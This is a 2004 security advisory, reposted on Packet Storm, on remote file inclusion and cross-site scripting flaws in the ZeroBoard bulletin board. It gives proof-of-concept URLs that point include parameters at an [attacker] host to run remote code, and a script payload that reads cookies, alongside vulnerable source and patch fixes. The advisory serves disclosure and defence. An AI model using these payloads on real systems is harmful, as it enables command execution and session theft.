exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

STG Security Advisory 2004-12-20.16

STG Security Advisory 2004-12-20.16
Posted Dec 31, 2004
Authored by STG Security | Site stgsecurity.com

STG Security Advisory: An input validation flaw in ZeroBoard versions 4.1pl4 and below can allow malicious attackers the ability to run arbitrary commands with the privilege of the HTTPD process, which is typically run as the nobody user.

tags | exploit, arbitrary
SHA-256 | c308b0793660dff9bacda679d6ea1adf0cf46f3c7d0c38cbc80870f869879079

STG Security Advisory 2004-12-20.16

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site
scripting vulnerabilities in ZeroBoard

Revision 1.2
Date Published: 2004-12-20 (KST)
Last Update: 2004-12-24
Disclosed by SSR Team (advisory@stgsecurity.com)

Summary
=======
ZeroBoard is one of widely used web BBS applications in Korea. . However, an
input validation flaw can cause malicious attackers to run arbitrary
commands with the privilege of the HTTPD process, which is typically run as
the nobody user.


Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
High : arbitrary commands execution.

Affected Products
================
ZeroBoard 4.1pl4 and prior

Vendor Status: NOT FIXED
========================
2004-11-20 Vulnerabilities found.
2004-11-20 1st vendor contact, but they didn't replied.
2004-11-22 2nd vendor contact, but they didn't replied.
2004-12-13 STG Security, Inc. customer notified.
2004-12-24 Official release.

Details
=======
Vulnerability 1 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/

- - - Environment
PHP 5.0.x
php.ini : register_globals = On

- - - Description
As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at
http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path
parameter in outlogin.php can be easily exploited.

- - - Part of vulnerable source, outlogin.php.
- - ----
// 제로보드 디렉토리 인지 체크
if(!file_exists($_zb_path."lib.php")) {
echo "제로보드 디렉토리가 아닙니다";
return;
}

// _head.php 읽음
@include $_zb_path."_head.php";

}
- - ----

Vulnerability 2 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/include/write.php?dir=http://[attacker]/


- - - Environment
php.ini: register_globals = On

- - - Reason
Uninitialized $dir variable in write.php


- - - Part of vulnerable source, include/write.php
- - ----
include $dir."/write.php";
- - ----

Vulnerability 3 : Cross-site scripting vulnerability
- - --------------------------------------
- - - Proof of concept
http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</sc
ript>


- - - Reason
check_user_id.php doesn't validate the input value of user_id.

- - - Part of vulnerable source, check_user_id.php
- - ----
$user_id = trim($user_id);
... 생략 ...
if($check[0]) echo "$user_id 는 이미 등록된<br> 아이디입니다";
else echo"$user_id 는 사용하실수 있습니다";
... 생략 ...
- - ----


Workaround
==========
Without official patches of theses vulnerability, modify the vulnerable
sources as following recommendations.

Vulnerability 1: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 59th line of outlogin.php,

if(eregi(":\/\/",$_zb_path)) $_zb_path="";


Vulnerability 2: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 15th line of include/write.php,

if(eregi(":\/\/",$dir)) $dir="";


Vulnerability 3: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 3rd line of check_user_id.php,

$user_id = htmlspecialchars(trim($user_id));


Credits
======
Jeremy Bae at STG Security

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBQctlEj9dVHd/hpsuEQJffgCg5fzqeXst5usCjWoK5fNV6lruGakAoJtM
awAFdddxTNRwEEy4vyUuxre9
=kiqS
-----END PGP SIGNATURE-----


Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    0 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close